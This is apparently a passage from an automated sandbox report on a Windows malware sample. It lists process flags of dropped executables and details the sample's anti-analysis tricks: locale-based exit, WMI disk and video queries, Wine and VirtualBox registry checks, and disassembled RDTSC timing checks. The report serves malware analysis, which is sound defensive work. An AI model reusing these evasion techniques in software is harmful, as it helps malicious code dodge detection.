Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-81829

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: ABEC99 second address: ABEC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4A265 second address: C4A280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C496BA second address: C496CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0E948C9FB6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d jl 00007F0E948C9FB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C49817 second address: C4984A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0E94F51A5Ch 0x0000000f jmp 00007F0E94F51A56h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4984A second address: C4986D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007F0E948C9FB6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C499D2 second address: C499F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E94F51A51h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F0E94F51A4Eh 0x00000011 jg 00007F0E94F51A46h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C499F9 second address: C49A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C924 second address: C4C93A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C93A second address: C4C94D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9A9 second address: C4C9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9AE second address: C4C9DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC1h 0x00000008 jg 00007F0E948C9FB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F0E948C9FC1h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9DF second address: C4C9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4C9E6 second address: C4CA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dx, 3EE4h 0x0000000c push 00000000h 0x0000000e mov edx, dword ptr [ebp+122D3A9Eh] 0x00000014 jnl 00007F0E948C9FC0h 0x0000001a push D9332C49h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jnp 00007F0E948C9FB6h 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CBBF second address: C4CBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CBCB second address: C4CBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC32 second address: C4CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1BC3h], eax 0x00000011 or di, 0107h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D3801h], ecx 0x0000001e push 836EBDB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007F0E94F51A4Ch 0x0000002b ja 00007F0E94F51A46h 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC63 second address: C4CC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CC6A second address: C4CCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 7C9142CDh 0x0000000e mov dword ptr [ebp+122D1C93h], edi 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D38F6h] 0x0000001c call 00007F0E94F51A57h 0x00000021 ja 00007F0E94F51A4Ch 0x00000027 mov edi, dword ptr [ebp+122D39DAh] 0x0000002d pop edx 0x0000002e push 00000000h 0x00000030 add dword ptr [ebp+122D3801h], edx 0x00000036 push 00000003h 0x00000038 jne 00007F0E94F51A4Ch 0x0000003e push 7A6F6830h 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4CCC9 second address: C4CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC5h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 459097D0h 0x00000018 mov edx, dword ptr [ebp+122D38C2h] 0x0000001e lea ebx, dword ptr [ebp+1246188Ah] 0x00000024 sub dword ptr [ebp+122D1CC7h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C5EF42 second address: C5EF5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F0E94F51A4Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6B889 second address: C6B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0E948C9FBEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 popad 0x00000016 push ebx 0x00000017 push esi 0x00000018 jp 00007F0E948C9FB6h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6B8C5 second address: C6B8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBB3 second address: C6BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBB9 second address: C6BBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BBBD second address: C6BBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BD07 second address: C6BD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 jng 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFCB second address: C6BFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FBBh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop ebx 0x0000000f jnc 00007F0E948C9FD8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFEC second address: C6BFFE instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6BFFE second address: C6C002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C11D second address: C6C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E94F51A46h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A52h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C2F7 second address: C6C302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C302 second address: C6C31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A52h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6C5A7 second address: C6C5B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0E948C9FB6h 0x00000009 jl 00007F0E948C9FB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C34479 second address: C3447D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3447D second address: C34483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6CB59 second address: C6CB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6CB5D second address: C6CB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBDh 0x00000008 jc 00007F0E948C9FB6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D0DB second address: C6D10C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E94F51A46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A58h 0x00000014 jmp 00007F0E94F51A4Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D10C second address: C6D112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D112 second address: C6D116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D4DE second address: C6D4E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E948C9FBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D4E8 second address: C6D549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E94F51A56h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jc 00007F0E94F51A52h 0x00000014 jmp 00007F0E94F51A4Ch 0x00000019 push esi 0x0000001a jmp 00007F0E94F51A57h 0x0000001f pop esi 0x00000020 pushad 0x00000021 jmp 00007F0E94F51A54h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D7EA second address: C6D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E948C9FB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6D7F7 second address: C6D7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70CE1 second address: C70CE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70CE6 second address: C70D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F0E94F51A5Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0E94F51A58h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jo 00007F0E94F51A4Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70D31 second address: C70D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBCh 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F0E948C9FBCh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C6FBB9 second address: C6FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C70E1A second address: C70E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C777CA second address: C777D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C777D0 second address: C777D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77950 second address: C77954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77A9E second address: C77AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 js 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AB7 second address: C77AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AC1 second address: C77ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a rdtsc
